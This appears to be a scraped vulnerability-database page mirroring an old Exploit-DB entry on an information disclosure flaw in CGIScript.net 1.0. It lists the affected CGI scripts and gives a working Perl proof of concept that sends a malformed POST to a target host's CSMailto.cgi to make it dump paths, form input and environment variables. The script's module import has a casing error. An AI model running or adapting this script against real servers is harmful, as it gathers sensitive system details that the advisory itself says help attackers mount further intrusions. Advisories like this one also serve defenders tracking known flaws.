https://www.exploit-db.com/exploits/21460
CGIScript.net 1.0 - Information Disclosure






漏洞ID | 1053587 | 漏洞类型 | |
发布时间 | 2002-05-17 | 更新时间 | 2002-05-17 |
![]() |
N/A | ![]() |
N/A |
漏洞平台 | CGI | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/4764/info
CGIScript.net provides various webmaster related tools and is maintained by Mike Barone and Andy Angrick.
It is possible to cause numerous scripts provided by CGIScript.net to disclose sensitive system information.
The following is a list of cgi scripts that are susceptible to this issue:
csBanner.cgi
csCreatePro.cgi
CSDownload.cgi
csFAQ.cgi
CSFiler.cgi
CSFileshare.cgi
CSGrid.cgi
CSIncludes.cgi
CSMailto.cgi
CSNews.cgi
CSNews.cgi (pro version)
CSRandomText.cgi
CSUpload.cgi
Path, form input, and environment variable information is disclosed when a malformed POST request is submitted. This information may aid the attacker in making further attacks against the host.
#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data
use strict;
use IO::Socket::Inet;
my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';
my $sock = IO::Socket::INET->new("$host:80");
print $sock "POST $path\n";
print $sock "Content-type: multipart/form-data;";
print $sock " boundary=--\n\n";
print <$sock>;
close($sock);
检索漏洞
开始时间
结束时间